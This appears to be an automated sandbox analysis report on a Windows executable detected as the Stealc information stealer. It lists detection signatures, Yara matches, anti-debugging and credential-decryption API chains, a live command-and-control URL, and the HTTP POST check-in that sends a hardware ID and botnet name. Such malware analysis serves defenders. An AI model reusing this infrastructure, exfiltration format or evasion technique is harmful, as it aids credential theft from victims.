Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hi2jR57Z15.exe

Overview

General Information

Sample name:hi2jR57Z15.exe
renamed because original name is a hash value
Original sample name:ca46940f226cad8c3123f7505fcad8a7.exe
Analysis ID:1541466
MD5:ca46940f226cad8c3123f7505fcad8a7
SHA1:3db9d734424f681d24d307bb5117cfceb39b0fd4
SHA256:db1209d9d0566e572841bb59895e676b434b9ee1bcbbd56c3d139c5e5d6de27a
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hi2jR57Z15.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\hi2jR57Z15.exe" MD5: CA46940F226CAD8C3123F7505FCAD8A7)
    • WerFault.exe (PID: 7416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x18fb:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1692629472.0000000002330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.hi2jR57Z15.exe.2330000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.hi2jR57Z15.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.hi2jR57Z15.exe.22e0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.hi2jR57Z15.exe.22e0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.hi2jR57Z15.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T21:32:00.378062+020020442431Malware Command and Control Activity Detected192.168.2.449730109.107.157.20880TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: hi2jR57Z15.exeAvira: detected
                      Source: 00000000.00000003.1692629472.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
                      Source: hi2jR57Z15.exeReversingLabs: Detection: 39%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: hi2jR57Z15.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022ECA87
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022F9107
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022E74A7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022E9D27
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022E9DC7

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeUnpacked PE file: 0.2.hi2jR57Z15.exe.400000.1.unpack
                      Source: hi2jR57Z15.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022F3B17
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022F4B77
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EE077
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022EC0D7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E1937
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022F4107
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022EF917
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022EE697
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022EEF87
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022F47D7
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022EDCE7

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 109.107.157.208:80
                      Source: Malware configuration extractorURLs: http://109.107.157.208/49aaa1bd4c594849.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 109.107.157.208Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 109.107.157.208Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 46 39 44 34 31 33 37 35 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 2d 2d 0d 0a Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="hwid"4F9D41375D0C3886582548------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="build"LogsDiller------CFBFCGIDAKECGCBGDBAF--
                      Source: Joe Sandbox ViewASN Name: VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 109.107.157.208
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 109.107.157.208Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 109.107.157.208Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 46 39 44 34 31 33 37 35 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 2d 2d 0d 0a Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="hwid"4F9D41375D0C3886582548------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="build"LogsDiller------CFBFCGIDAKECGCBGDBAF--
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php)w
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php/
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.0000000000893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.phpYpJ
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208/G
                      Source: hi2jR57Z15.exe, 00000000.00000002.1924904290.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.107.157.208C
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0230D2570_2_0230D257
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0230CEFF0_2_0230CEFF
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0231370B0_2_0231370B
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1044
                      Source: hi2jR57Z15.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: hi2jR57Z15.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GGV5VEHH.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7276
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f455f9bb-58f6-4ed5-a35a-fd6774b260efJump to behavior
                      Source: hi2jR57Z15.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: hi2jR57Z15.exeReversingLabs: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\hi2jR57Z15.exe "C:\Users\user\Desktop\hi2jR57Z15.exe"
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1044
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeUnpacked PE file: 0.2.hi2jR57Z15.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeUnpacked PE file: 0.2.hi2jR57Z15.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00805F08 push eax; ret 0_2_00805F26
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00805F17 push eax; ret 0_2_00805F26
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00802F37 push 7DD07DC0h; iretd 0_2_00802F48
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_022FB29C push ecx; ret 0_2_022FB2AF
                      Source: hi2jR57Z15.exeStatic PE information: section name: .text entropy: 7.018176331066259
                      Source: C:\Users\user\Desktop\hi2jR57Z15.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
